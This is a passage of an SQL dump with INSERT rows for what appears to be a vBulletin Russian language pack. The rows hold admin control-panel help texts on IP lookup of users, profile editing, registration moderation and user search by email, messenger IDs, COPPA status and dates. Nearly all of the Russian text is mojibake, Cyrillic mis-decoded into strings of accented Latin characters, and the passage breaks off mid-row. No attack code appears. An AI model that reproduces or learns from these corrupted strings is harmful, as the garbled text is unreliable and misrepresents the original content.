(24305, -1, 'user_doips_ipaddress_title', 'cphelptext', 'Ãà éòè ïîëüçîâà òåëåé ïî IP à äðåñó', 'vbulletin', '', 0, ''),
(24306, -1, 'user_doips_username_text', 'cphelptext', 'Ââåäèòå èìÿ ïîëüçîâà òåëÿ, ÷òîáû Ãà éòè âñå èñïîëüçóåìûå èì IP à äðåñà .', 'vbulletin', '', 0, ''),
(24307, -1, 'user_doips_username_title', 'cphelptext', 'Ãà éòè IP à äðåñà ïîëüçîâà òåëÿ', 'vbulletin', '', 0, ''),
(24308, -1, 'user_doips_depth_text', 'cphelptext', 'Ãðè ãëóáèÃÃ¥ ïîèñêà 1, âà ì áóäóò îòîáðà æåÃû ëèøü ðåçóëüòà òû ïîèñêà . Ãðè ãëóáèÃÃ¥ 2 - âû ïîëó÷èòå ðåçóëüòà òû ïîèñêà â òà êîì âèäå, êà ê áóäòî äëÿ êà æäîãî ïîëó÷åÃÃîãî ðåçóëüòà òà âû ïðîâåëè áû îòäåëüÃûé ïîèñê.\r\n Ãà ïðèìåð: \r\nÈùåì ïîëüçîâà òåëåé ñ IP 127.0.0.1 è ãëóáèÃîé ïîèñêà 1: ðåçóëüòà òû \"à äìèÃ\" è \"zÌà ðêîâêà \". Ãðè ïîèñêå ïî IP 127.0.0.1 è ãëóáèÃîé 2 ìû ïîëó÷èì: \"à äìèÃ\" è \"zÌà ðêîâêà \", à òà êæå âñå IP à äðåñà , ïîä êîòîðûìè çà õîäèëè ïîëüçîâà òåëè \"à äìèÃ\" è \"zÌà ðêîâêà \".', 'vbulletin', '', 0, ''),
(24309, -1, 'user_doips_depth_title', 'cphelptext', 'ÃëóáèÃà ïîèñêà ', 'vbulletin', '', 0, ''),
(24310, -1, 'user_edit_text', 'cphelptext', 'Çäåñü âû ìîæåòå ðåäà êòèðîâà òü ïðîôèëü è Ãà ñòðîéêè ïîëüçîâà òåëÿ.', 'vbulletin', '', 0, ''),
(24311, -1, 'user_edit_title', 'cphelptext', 'Ãåäà êòèðîâà òü ïîëüçîâà òåëÿ', 'vbulletin', '', 0, ''),
(24312, -1, 'user_edit_receivepmbuddies_text', 'cphelptext', 'Ãòà îïöèÿ îãðà Ãè÷èâà åò ïðè¸ì ëè÷Ãûõ ñîîáùåÃèé ïîëüçîâà òåëÿìè èç ñïèñêà çÃà êîìûõ è ìîäåðà òîðà ìè.', 'vbulletin', 'zCarot', 1196775359, '3.7.0 Beta 1'),
(24313, -1, 'user_edit_receivepmbuddies_title', 'cphelptext', 'Ãîëó÷à òü ëè÷Ãûå ñîîáùåÃèÿ òîëüêî îò çÃà êîìûõ è ìîäåðà òîðîâ', 'vbulletin', 'zCarot', 1196766083, '3.7.0 Beta 1'),
(24314, -1, 'user_edit_vm_contactonly_text', 'cphelptext', 'Åñëè \"Äà \", òî ïóáëè÷Ãûå ñîîáùåÃèÿ äëÿ ýòîãî ïîëüçîâà òåëÿ ñìîãóò îòïðà âëÿòü ëèøü òå, êòî Ãà õîäèòñÿ â åãî ñïèñêå çÃà êîìûõ, à òà êæå ìîäåðà òîðû è à äìèÃèñòðà òîðû ôîðóìà .', 'vbulletin', 'zCarot', 1207920870, '3.7.0 Release Candidate 4'),
(24315, -1, 'user_edit_vm_contactonly_title', 'cphelptext', 'Îãðà Ãè÷èòü äîñòóï ê îòïðà âêå âà ì ïóáëè÷Ãûõ ñîîáùåÃèé òîëüêî çÃà êîìûìè è ìîäåðà òîðà ìè', 'vbulletin', 'zCarot', 1207920870, '3.7.0 Release Candidate 4'),
(24316, -1, 'user_edit_password_text', 'cphelptext', 'Åñëè Ãåîáõîäèìî ñìåÃèòü ïà ðîëü ýòîãî ïîëüçîâà òåëÿ, ââåäèòå åãî ñþäà .  äðóãèõ ñëó÷à ÿõ îñòà âüòå ïîëå ïóñòûì.', 'vbulletin', '', 0, ''),
(24317, -1, 'user_edit_password_title', 'cphelptext', 'Ãà ðîëü', 'vbulletin', '', 0, ''),
(24318, -1, 'user_editaccess_text', 'cphelptext', 'Çäåñü âû ìîæåòå ðåäà êòèðîâà òü ïðà âà äîñòóïà Ãà ïîëüçîâà òåëüñêîì óðîâÃÃ¥ (â îòëè÷èå îò ãðóïïîâîãî óðîâÃÿ). \r\nÓáåäèòåñü, ÷òî ìà ñêè äîñòóïà âêëþ÷åÃû çäåñü , â ïðîòèâÃîì ñëó÷à å ðà çðåøåÃèÿ Ãà óðîâÃÃ¥ ïîëüçîâà òåëÿ ÃÃ¥ áóäóò ðà áîòà òü.', 'vbulletin', 'zCarot', 1205430879, '3.7.0 Release Candidate 1'),
(24319, -1, 'user_editaccess_title', 'cphelptext', 'Ãåäà êòèðîâà Ãèå ìà ñîê äîñòóïà ', 'vbulletin', '', 0, ''),
(24320, -1, 'user_emailpassword_text', 'cphelptext', 'Ãà æìèòå Ãà êÃîïêó Ãèæå, ÷òîáû îòïðà âèòü Ãà ïîìèÃà Ãèå ïà ðîëÿ äà ÃÃîìó ïîëüçîâà òåëþ.', 'vbulletin', '', 0, ''),
(24321, -1, 'user_emailpassword_title', 'cphelptext', 'Ãà ïîìèÃà Ãèå ïà ðîëÿ ïîëüçîâà òåëþ ïî ýëåêòðîÃÃîé ïî÷òå', 'vbulletin', '', 0, ''),
(24322, -1, 'user_find_text', 'cphelptext', 'Ãòî ðåçóëüòà òû âà øåãî ïîèñêà .', 'vbulletin', '', 0, ''),
(24323, -1, 'user_find_title', 'cphelptext', 'Ãîèñê ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(24324, -1, 'user_find2_text', 'cphelptext', 'Ãòî ðåçóëüòà òû âà øåãî ïîèñêà .', 'vbulletin', '', 0, ''),
(24325, -1, 'user_find2_title', 'cphelptext', 'Ãîèñê ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(24326, -1, 'user_moderate_text', 'cphelptext', 'Ñëåäóþùèå ïîëüçîâà òåëè îæèäà þò ïðîâåðêè. Âû ìîæåòå ïðèÃÿòü, óäà ëèòü èëè èãÃîðèðîâà òü ýòè ðåãèñòðà öèè.', 'vbulletin', '', 0, ''),
(24327, -1, 'user_moderate_title', 'cphelptext', 'Ãîëüçîâà òåëè, îæèäà þùèå ïðîâåðêè', 'vbulletin', '', 0, ''),
(24328, -1, 'user_moderate_send_validated_text', 'cphelptext', 'Âûáåðèòå \"Äà \" äëÿ îòïðà âêè ýëåêòðîÃÃûõ ïèñåì ïîëüçîâà òåëÿì, ðåãèñòðà öèè êîòîðûõ âû ïðèÃÿëè. Åñëè ÃÃ¥ æåëà åòå îòïðà âëÿòü, âûáåðèòå \"Ãåò\".', 'vbulletin', '', 0, ''),
(24329, -1, 'user_moderate_send_validated_title', 'cphelptext', 'Ãîñëà òü ýëåêòðîÃÃûå ïèñüìà ïîëüçîâà òåëÿì, êîòîðûå áûëè ïðèÃÿòû', 'vbulletin', '', 0, ''),
(24330, -1, 'user_moderate_send_deleted_text', 'cphelptext', 'Âûáåðèòå \"Äà \" äëÿ îòïðà âêè ýëåêòðîÃÃûõ ïèñåì ïîëüçîâà òåëÿì, ðåãèñòðà öèè êîòîðûõ âû óäà ëèëè. Åñëè ÃÃ¥ æåëà åòå îòïðà âëÿòü, âûáåðèòå \"Ãåò\".', 'vbulletin', '', 0, ''),
(24331, -1, 'user_moderate_send_deleted_title', 'cphelptext', 'Ãîñëà òü ýëåêòðîÃÃûå ïèñüìà ïîëüçîâà òåëÿì, êîòîðûå áûëè óäà ëåÃû', 'vbulletin', '', 0, ''),
(24332, -1, 'user_modify_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ìîæåòå çà äà òü ðà çëè÷Ãûå ïà ðà ìåòðû ïîèñêà ïîëüçîâà òåëåé. Çäåñü æå Ãà õîäÿòñÿ îïöèè \"Ãûñòðûé ïîèñê\" è \"Ãà ñøèðåÃÃûé ïîèñê\". \r\nÒà áëèöà \"Ãûñòðûé ïîèñê\" èìååò Ãåñêîëüêî îïöèé. \"Ãîêà çà òü âñåõ ïîëüçîâà òåëåé\" ïîêà çûâà åò áóêâà ëüÃî âñåõ ïîëüçîâà òåëåé, ÃÃ¥ îãðà Ãè÷èâà ÿ ðåçóëüòà òû ïîèñêà . \"Ñïèñîê ëó÷øèõ à âòîðîâ\" îòîáðà æà åò âñåõ ïîëüçîâà òåëåé è ñîðòèðóåò èõ ïî êîëè÷åñòâó ðà çìåùåÃÃûõ èìè ñîîáùåÃèé, ïîêà çûâà ÿ ïîëüçîâà òåëÿ ñ Ãà èáîëüøèì ÷èñëîì ñîîáùåÃèé ïåðâûì. \"Ñïèñîê ïîñåòèòåëåé çà ïðîøëûå 24 ÷à ñà \" îòîáðà æà åò âñåõ ïîëüçîâà òåëåé, ïîñåòèâøèõ âà ø ôîðóì çà ïîñëåäÃèå 24 ÷à ñà . \"ÃîñëåäÃèå ðåãèñòðà öèè\" îòîáðà æà åò âñåõ ïîëüçîâà òåëåé è ñîðòèðóåò èõ ïî äà òå ðåãèñòðà öèè, ïîêà çûâà ÿ ïîñëåäÃèõ çà ðåãèñòðèðîâà âøèõñÿ ïåðâûìè. \"Ñïèñîê ïîëüçîâà òåëåé, îæèäà þùèõ ïðîâåðêè\" îòîáðà æà åò âñåõ ïîëüçîâà òåëåé, êòî îòÃîñèòñÿ ê ãðóïïå ïîëüçîâà òåëåé \"(COPPA) Ãîëüçîâà òåëè, îæèäà þùèå ïðîâåðêè\". \"Ãîêà çà òü COPPA ïîëüçîâà òåëåé\" îòîáðà æà åò âñåõ ïîëüçîâà òåëåé, êòî îòìå÷åà êà ê COPPA ïîëüçîâà òåëü. Äëÿ òîãî, ÷òîáû áîëüøå óçÃà òü î COPPA, Ãà æìèòå çäåñü . \r\nÒà áëèöà \"Ãà ñøèðåÃÃûé ïîèñê\" ñîäåðæèò ðà çÃîîáðà çÃûå îïöèè ïîèñêà . Ñìîòðèòå ïîäðîáÃóþ èÃôîðìà öèþ Ãèæå, åñëè ó âà ñ âîçÃèêëè êà êèå-ëèáî âîïðîñû.', 'vbulletin', 'zCarot', 1231760784, '3.8.1'),
(24333, -1, 'user_modify_title', 'cphelptext', 'Ãîèñê ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(24334, -1, 'user_modify_username_text', 'cphelptext', 'Ãóäóò Ãà éäåÃû ïîëüçîâà òåëè, èìåÃà êîòîðûõ ñîäåðæèò óêà çà ÃÃóþ çäåñü ñòðîêó. ÃŽÃè ÃÃ¥ îáÿçà òåëüÃî äîëæÃû ñîñòà âëÿòü ñëîâî öåëèêîì, Ãî äîëæÃû áûòü â òîì æå ïîðÿäêå, êà ê è â èìåÃè. \r\nÃà ïðèìåð, ñòðîêà ïðèì ñîîòâåòñòâóåò ñëîâà ì ïðèìåð , ÃåïðèìåòÃûé è ïðèìåðî÷Ãà ÿ , Ãî ÃÃ¥ ïðèåìëåìûé .', 'vbulletin', '', 0, ''),
(24335, -1, 'user_modify_username_title', 'cphelptext', 'Ñîñòà âëÿþùèå èìåÃè ïîëüçîâà òåëÿ', 'vbulletin', '', 0, ''),
(24336, -1, 'user_modify_usergroupid_text', 'cphelptext', 'Ãîèñê ïîëüçîâà òåëåé, ïðèÃà äëåæà ùèõ óêà çà ÃÃîé îñÃîâÃîé ãðóïïå.', 'vbulletin', '', 0, ''),
(24337, -1, 'user_modify_usergroupid_title', 'cphelptext', 'ÎñÃîâÃà ÿ ãðóïïà ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(24338, -1, 'user_modify_membergroup_text', 'cphelptext', 'Óêà æèòå ãðóïïû ïîëüçîâà òåëåé, â êîòîðûå äîëæÃû âõîäèòü èñêîìûå ïîëüçîâà òåëè.', 'vbulletin', '', 0, ''),
(24339, -1, 'user_modify_membergroup_title', 'cphelptext', 'Òà êæå ïðèÃà äëåæèò ãðóïïà ì', 'vbulletin', '', 0, ''),
(24340, -1, 'user_modify_adminemail_text', 'cphelptext', 'Ãòà îïöèÿ ïîçâîëèò âà ì âêëþ÷à òü èëè èñêëþ÷à òü èç ðåçóëüòà òîâ ïîèñêà ïîëüçîâà òåëåé ïî êðèòåðèþ âêëþ÷åÃÃîñòè îïöèè \"ÃðèÃèìà òü ýëåêòðîÃÃûå ïèñüìà îò à äìèÃèñòðà öèè\" â èõ Ãà ñòðîéêà õ.', 'vbulletin', '', 0, ''),
(24341, -1, 'user_modify_adminemail_title', 'cphelptext', 'Âêëþ÷à ÿ ïîëüçîâà òåëåé, êîòîðûå îòêëþ÷èëè ïîëó÷åÃèå ýëåêòðîÃÃûõ ïèñåì îò à äìèÃèñòðà öèè', 'vbulletin', '', 0, ''),
(24342, -1, 'user_modify_email_text', 'cphelptext', 'Àäðåñà ýëåêòðîÃÃîé ïî÷òû Ãà éäåÃÃûõ ïîëüçîâà òåëåé áóäóò ñîäåðæà òü ñòðîêó, ââåä¸ÃÃóþ çäåñü. Ñì. Èìÿ , ÷òîáû óçÃà òü ïîäðîáÃîñòè îòáîðà ïî ýòîìó è ïîäîáÃûì êðèòåðèÿì.', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(24343, -1, 'user_modify_email_title', 'cphelptext', 'Ñîñòà âëÿþùèå à äðåñà ýëåêòðîÃÃîé ïî÷òû', 'vbulletin', '', 0, ''),
(24344, -1, 'user_modify_parentemail_text', 'cphelptext', 'Åñëè èñêîìûå ïîëüçîâà òåëè - COPPA, îÃè äîëæÃû ââîäèòü à äðåñ ýëåêòðîÃÃîé ïî÷òû ñâîèõ ðîäèòåëåé äëÿ ïðîâåðêè. Åñëè ýòî òà ê, òî ââåäåÃÃà ÿ ñþäà ñòðîêà äîëæÃà ñîäåðæà òüñÿ â ýòîì à äðåñå, ÷òîáû ïîëüçîâà òåëü áûë Ãà éäåÃ. Ñì. Ñîñòà âëÿþùèå èìåÃè ïîëüçîâà òåëÿ , ÷òîáû óçÃà òü ïîäðîáÃîñòè îòáîðà ïî ýòîìó è ïîäîáÃûì êðèòåðèÿì.', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(24345, -1, 'user_modify_parentemail_title', 'cphelptext', 'Ñîñòà âëÿþùèå à äðåñà ýëåêòðîÃÃîé ïî÷òû ðîäèòåëåé', 'vbulletin', '', 0, ''),
(24346, -1, 'user_modify_coppauser_text', 'cphelptext', 'Åñëè óñòà ÃîâëåÃî â \"Äà \", áóäóò Ãà éäåÃû âñå ïîëüçîâà òåëè COPPA; ò.Ã¥. èì áóäåò äî 13 ëåò. Óñòà Ãîâèòå çäåñü \"Ãåò\", ÷òîáû ÃÃ¥ èñêà òü ïîëüçîâà òåëåé COPPA, èëè âûáåðèòå \"Îáà òèïà \", ÷òîáû èñêà òü è òåõ è äðóãèõ.', 'vbulletin', '', 0, ''),
(24347, -1, 'user_modify_coppauser_title', 'cphelptext', 'Ãîëüçîâà òåëü COPPA', 'vbulletin', '', 0, ''),
(24348, -1, 'user_modify_homepage_text', 'cphelptext', 'Ââåäèòå ñòðîêó, êîòîðà ÿ äîëæÃà ñîäåðæà òüñÿ â à äðåñå äîìà øÃåé ñòðà Ãèöû èñêîìûõ ïîëüçîâà òåëåé. Ãîëüçîâà òåëè, ÃÃ¥ óêà çà âøèå URL äîìà øÃåé ñòðà Ãè÷êè, áóäóò à âòîìà òè÷åñêè èñêëþ÷åÃû èç ðåçóëüòà òîâ ïîèñêà . Ñì. Ñîñòà âëÿþùèå èìåÃè ïîëüçîâà òåëÿ , ÷òîáû óçÃà òü ïîäðîáÃîñòè îòáîðà ïî ýòîìó è ïîäîáÃûì êðèòåðèÿì.', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(24349, -1, 'user_modify_homepage_title', 'cphelptext', 'Ñîñòà âëÿþùèå äîìà øÃåé ñòðà Ãèöû', 'vbulletin', '', 0, ''),
(24350, -1, 'user_modify_icq_text', 'cphelptext', 'Ââåäèòå öèôðû, êîòîðûå äîëæÃû ñîäåðæà òüñÿ â Ãîìåðå ICQ èñêîìûõ ïîëüçîâà òåëåé. Ã’.ê. Ãîìåðà ICQ ñîäåðæà ò òîëüêî öèôðû, âû ìîæåòå ââîäèòü ñþäà òîëüêî öèôðû. Ãîëüçîâà òåëè, ÃÃ¥ óêà çà âøèå Ãîìåð ICQ, áóäóò à âòîìà òè÷åñêè èñêëþ÷åÃû èç ðåçóëüòà òîâ ïîèñêà . Ñì. Ñîñòà âëÿþùèå èìåÃè ïîëüçîâà òåëÿ , ÷òîáû óçÃà òü ïîäðîáÃîñòè îòáîðà ïî ýòîìó è ïîäîáÃûì êðèòåðèÿì.', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(24351, -1, 'user_modify_icq_title', 'cphelptext', 'Ñîñòà âëÿþùèå Ãîìåðà ICQ', 'vbulletin', '', 0, ''),
(24352, -1, 'user_modify_aim_text', 'cphelptext', 'Ââåäèòå ñòðîêó ñèìâîëîâ, êîòîðà ÿ äîëæÃà ñîäåðæà òüñÿ â èìåÃè AIM èñêîìûõ ïîëüçîâà òåëåé. Ãîëüçîâà òåëè áåç èìåÃè AIM à âòîìà òè÷åñêè èñêëþ÷à þòñÿ èç ðåçóëüòà òîâ ïîèñêà . Ñì. Ñîñòà âëÿþùèå èìåÃè ïîëüçîâà òåëÿ , ÷òîáû óçÃà òü ïîäðîáÃîñòè îòáîðà ïî ýòîìó è ïîäîáÃûì êðèòåðèÿì.', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(24353, -1, 'user_modify_aim_title', 'cphelptext', 'Ñîñòà âëÿþùèå AIM-èäåÃòèôèêà òîðà ', 'vbulletin', '', 0, ''),
(24354, -1, 'user_modify_yahoo_text', 'cphelptext', 'Ââåäèòå ñòðîêó, êîòîðà ÿ äîëæÃà ñîäåðæà òüñÿ â èìåÃè Yahoo Messenger ïîëüçîâà òåëÿ. Ãîëüçîâà òåëè, ÃÃ¥ óêà çà âøèå èìÿ Yahoo Messenger, áóäóò à âòîìà òè÷åñêè èñêëþ÷åÃû èç ðåçóëüòà òîâ ïîèñêà . Ñì. Ñîñòà âëÿþùèå èìåÃè ïîëüçîâà òåëÿ , ÷òîáû óçÃà òü ïîäðîáÃîñòè îòáîðà ïî ýòîìó è ïîäîáÃûì êðèòåðèÿì.', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(24355, -1, 'user_modify_yahoo_title', 'cphelptext', 'ÈäåÃòèôèêà òîð Yahoo Messenger', 'vbulletin', '', 0, ''),
(24356, -1, 'user_modify_msn_text', 'cphelptext', 'Ââåäèòå ñòðî÷êó, êîòîðóþ äîëæÃî ñîäåðæà òü èìÿ MSN ïîëüçîâà òåëÿ. Ãîëüçîâà òåëè, ÃÃ¥ óêà çà âøèå èìåÃè MSN, áóäóò à âòîìà òè÷åñêè èñêëþ÷åÃû èç ðåçóëüòà òîâ ïîèñêà . Ñì. Ñîñòà âëÿþùèå èìåÃè ïîëüçîâà òåëÿ , ÷òîáû óçÃà òü ïîäðîáÃîñòè îòáîðà ïî ýòîìó è ïîäîáÃûì êðèòåðèÿì.', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(24357, -1, 'user_modify_msn_title', 'cphelptext', 'Èìÿ MSN', 'vbulletin', '', 0, ''),
(24358, -1, 'user_modify_skype_text', 'cphelptext', 'Ââåäèòå ñòðî÷êó, êîòîðà ÿ äîëæÃà ñîäåðæà òüñÿ â ïîëüçîâà òåëüñêîì èìåÃè Skype. \r\n \r\nÃîëüçîâà òåëè, ó êîòîðûõ ÃÃ¥ óêà çà Ãî èìÿ â Skype, áóäóò à âòîìà òè÷åñêè èñêëþ÷åÃû èç ïîèñêà . Ñì. Ñîñòà âëÿþùèå èìåÃè ïîëüçîâà òåëÿ äëÿ ïîëó÷åÃèÿ áîëüøåé èÃôîðìà öèè î ïîèñêå ÷à ñòè ñëîâà , èñïîëüçóåìîé çäåñü.', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(24359, -1, 'user_modify_skype_title', 'cphelptext', 'Èìÿ â Skype', 'vbulletin', '', 0, ''),
(24360, -1, 'user_modify_signature_text', 'cphelptext', 'Ââåäèòå ñòðîêó, êîòîðà ÿ äîëæÃà ñîäåðæà òüñÿ â ïîäïèñè èñêîìûõ ïîëüçîâà òåëåé. Ãîëüçîâà òåëè áåç ïîäïèñè áóäóò à âòîìà òè÷åñêè èñêëþ÷åÃû èç ðåçóëüòà òîâ ïîèñêà . Ñì. Ñîñòà âëÿþùèå èìåÃè ïîëüçîâà òåëÿ , ÷òîáû óçÃà òü ïîäðîáÃîñòè îòáîðà ïî ýòîìó è ïîäîáÃûì êðèòåðèÿì.', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(24361, -1, 'user_modify_signature_title', 'cphelptext', 'Ñîñòà âëÿþùèå ïîäïèñè', 'vbulletin', '', 0, ''),
(24362, -1, 'user_modify_usertitle_text', 'cphelptext', 'Ââåäèòå ñòðîêó, êîòîðà ÿ äîëæÃà ñîäåðæà òüñÿ â ñòà òóñå èñêîìûõ ïîëüçîâà òåëåé. Ãòîò ïîèñê áóäåò ðà áîòà òü, äà æå åñëè âû çà ïðåòèëè îñîáûå ñòà òóñû, ò.ê. ñòà òóñ ïîëüçîâà òåëÿ õðà Ãèòñÿ âìåñòå ñ åãî èìåÃåì ïîëüçîâà òåëÿ; òà êæå áóäåò îñóùåñòâëåà ïîèñê ïî ñòà òóñó, îïðåäåëåÃÃîìó äëÿ ÷ëåÃà ãðóïïû, â êîòîðóþ âõîäèò ïîëüçîâà òåëü. Ñì. Ñîñòà âëÿþùèå èìåÃè ïîëüçîâà òåëÿ , ÷òîáû óçÃà òü ïîäðîáÃîñòè îòáîðà ïî ýòîìó è ïîäîáÃûì êðèòåðèÿì.', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(24363, -1, 'user_modify_usertitle_title', 'cphelptext', 'Ñîñòà âëÿþùèå ñòà òóñà ïîëüçîâà òåëÿ', 'vbulletin', '', 0, ''),
(24364, -1, 'user_modify_joindateafter_text', 'cphelptext', 'Ãóäóò Ãà éäåÃû ïîëüçîâà òåëè, äà òà ðåãèñòðà öèè êîòîðûõ ÃÎÑËÅ óêà çà ÃÃîé äà òû. Ôîðìà ò äà òû - ãããã-ìì-ää; Ãà ïðèìåð, 2005-02-26. Ãòîò êðèòåðèé ìîæåò áûòü èñïîëüçîâà à âìåñòå ñ êðèòåðèåì \"Ãåãèñòðà öèÿ äî\" äëÿ ïîèñêà îïðåäåë¸ÃÃîãî ïðîìåæóòêà âðåìåÃè. Åñëè âû èñïîëüçóåòå îáà ýòè êðèòåðèÿ, ýòà äà òà äîëæÃà áûòü ÄÎ äà òû, óêà çà ÃÃîé â \"Ãåãèñòðà öèÿ äî\". (Ñì. Ãåãèñòðà öèÿ äî )', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(24365, -1, 'user_modify_joindateafter_title', 'cphelptext', 'Ãåãèñòðà öèÿ ïîñëå', 'vbulletin', '', 0, ''),
(24366, -1, 'user_modify_joindatebefore_text', 'cphelptext', 'Ãóäóò Ãà éäåÃû ïîëüçîâà òåëè, äà òà ðåãèñòðà öèè êîòîðûõ ÄÎ óêà çà ÃÃîé äà òû. Ôîðìà ò äà òû - ãããã-ìì-ää; Ãà ïðèìåð, 2005-02-26. Ãòîò êðèòåðèé ìîæåò áûòü èñïîëüçîâà à âìåñòå ñ êðèòåðèåì \"Ãåãèñòðà öèÿ ïîñëå\" äëÿ ïîèñêà îïðåäåë¸ÃÃîãî ïðîìåæóòêà âðåìåÃè. Åñëè âû èñïîëüçóåòå îáà ýòè êðèòåðèÿ, ýòà äà òà äîëæÃà áûòü ÃÎÑËÅ äà òû, óêà çà ÃÃîé â \"Ãåãèñòðà öèÿ ïîñëå\". (Ñì. Ãåãèñòðà öèÿ ïîñëå )', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(24367, -1, 'user_modify_joindatebefore_title', 'cphelptext', 'Ãåãèñòðà öèÿ äî', 'vbulletin', '', 0, ''),
(24368, -1, 'user_modify_lastactivityafter_text', 'cphelptext', 'Ãóäóò Ãà éäåÃû ïîëüçîâà òåëè, îòêðûâà âøèå ñòðà Ãèöû ôîðóìà ïîçæå ýòîé äà òû. Ôîðìà ò: ãããã-ìì-ää; Ãà ïðèìåð, 2005-07-21. Ãòîò êðèòåðèé ìîæåò èñïîëüçîâà òüñÿ ñîâìåñòÃî ñ êðèòåðèåì ïîèñêà ïîëüçîâà òåëÿ \"ÃîñëåäÃÿÿ à êòèâÃîñòü äî\", òîãäà áóäåò çà äà à èÃòåðâà ë âðåìåÃè ïîñëåäÃåé à êòèâÃîñòè ïîëüçîâà òåëÿ.', 'vbulletin', '', 0, ''),
(24369, -1, 'user_modify_lastactivityafter_title', 'cphelptext', 'ÃîñëåäÃÿÿ à êòèâÃîñòü ïîñëå', 'vbulletin', '', 0, ''),
(24370, -1, 'user_modify_lastactivitybefore_text', 'cphelptext', 'Ãóäóò Ãà éäåÃû ïîëüçîâà òåëè, îòêðûâà âøèå ñòðà Ãèöû ôîðóìà äî ýòîé äà òû. Ôîðìà ò: ãããã-ìì-ää; Ãà ïðèìåð, 2005-07-21. Ãòîò êðèòåðèé ìîæåò èñïîëüçîâà òüñÿ ñîâìåñòÃî ñ êðèòåðèåì ïîèñêà ïîëüçîâà òåëÿ \"ÃîñëåäÃÿÿ à êòèâÃîñòü ïîñëå\", òîãäà áóäåò çà äà à èÃòåðâà ë âðåìåÃè ïîñëåäÃåé à êòèâÃîñòè ïîëüçîâà òåëÿ.', 'vbulletin', '', 0, ''),
(24371, -1, 'user_modify_lastactivitybefore_title', 'cphelptext', 'ÃîñëåäÃÿÿ à êòèâÃîñòü äî', 'vbulletin', '', 0, ''),
(24372, -1, 'user_modify_lastvisitafter_text', 'cphelptext', 'Ãóäóò Ãà éäåÃû ïîëüçîâà òåëè, äà òà è âðåìÿ ïîñëåäÃåãî âèçèòà êîòîðûõ ÃÎÑËÅ óêà çà ÃÃîé äà òû. Ôîðìà ò äà òû è âðåìåÃè - ãããã-ìì-ää ÷÷:ìì:ññ; Ãà ïðèìåð, 2005-02-26 22:45:00 Ãà éäåò âñåõ ïîëüçîâà òåëåé, êòî ïîñëåäÃèé ðà ç ïîñåùà ë ôîðóì ïîñëå 22:45 26 ôåâðà ëÿ 2005 ã. Ãòîò êðèòåðèé ìîæåò áûòü èñïîëüçîâà à âìåñòå ñ êðèòåðèåì \"ÃîñëåäÃèé âèçèò äî\" äëÿ ïîèñêà îïðåäåë¸ÃÃîãî ïðîìåæóòêà âðåìåÃè. Åñëè âû èñïîëüçóåòå îáà ýòè êðèòåðèÿ, ýòà äà òà äîëæÃà áûòü ÄÎ äà òû, óêà çà ÃÃîé â \"ÃîñëåäÃèé âèçèò äî\". (Ñì. ÃîñëåäÃèé âèçèò äî )', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(24373, -1, 'user_modify_lastvisitafter_title', 'cphelptext', 'ÃîñëåäÃåå ïîñåùåÃèå ïîñëå', 'vbulletin', '', 0, ''),
(24374, -1, 'user_modify_lastvisitbefore_text', 'cphelptext', 'Ãóäóò Ãà éäåÃû ïîëüçîâà òåëè, äà òà è âðåìÿ ïîñëåäÃåãî âèçèòà êîòîðûõ ÄÎ óêà çà ÃÃîé äà òû. Ôîðìà ò äà òû è âðåìåÃè - ãããã-ìì-ää ÷÷:ìì:ññ; Ãà ïðèìåð, 2005-02-26 23:50:00 Ãà éäåò âñåõ ïîëüçîâà òåëåé, êòî ïîñëåäÃèé ðà ç ïîñåùà ë ôîðóì äî 23:50 26 ôåâðà ëÿ 2005 ã. Ãòîò êðèòåðèé ìîæåò áûòü èñïîëüçîâà à âìåñòå ñ êðèòåðèåì \"ÃîñëåäÃèé âèçèò ïîñëå\" äëÿ ïîèñêà îïðåäåë¸ÃÃîãî ïðîìåæóòêà âðåìåÃè. Åñëè âû èñïîëüçóåòå îáà ýòè êðèòåðèÿ, ýòà äà òà äîëæÃà áûòü ÃÎÑËÅ äà òû, óêà çà ÃÃîé â \"ÃîñëåäÃèé âèçèò ïîñëå\". (Ñì. ÃîñëåäÃèé âèçèò ïîñëå )', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(24375, -1, 'user_modify_lastvisitbefore_title', 'cphelptext', 'ÃîñëåäÃåå ïîñåùåÃèå äî', 'vbulletin', '', 0, ''),
(24376, -1, 'user_modify_lastpostafter_text', 'cphelptext', 'Ãóäóò Ãà éäåÃû ïîëüçîâà òåëè, äà òà è âðåìÿ ïîñëåäÃåãî ñîîáùåÃèÿ êîòîðûõ ÃÎÑËÅ óêà çà ÃÃîé äà òû. Ôîðìà ò äà òû è âðåìåÃè - ãããã-ìì-ää ÷÷:ìì:ññ; Ãà ïðèìåð, 2005-02-26 22:24:00 Ãà éäåò âñåõ ïîëüçîâà òåëåé, êòî îñòà âëÿë ñâîè ñîîáùåÃèÿ ïîñëå 22:24 26 ôåâðà ëÿ 2005 ã. Ãòîò êðèòåðèé ìîæåò áûòü èñïîëüçîâà à âìåñòå ñ êðèòåðèåì \"ÃîñëåäÃåå ñîîáùåÃèå äî\" äëÿ ïîèñêà îïðåäåë¸ÃÃîãî ïðîìåæóòêà âðåìåÃè. Åñëè âû èñïîëüçóåòå îáà ýòè êðèòåðèÿ, ýòà äà òà äîëæÃà áûòü ÄÎ äà òû, óêà çà ÃÃîé â \"ÃîñëåäÃåå ñîîáùåÃèå äî\". (Ñì. ÃîñëåäÃåå ñîîáùåÃèå äî )', 'vbulletin', 'zCarot', 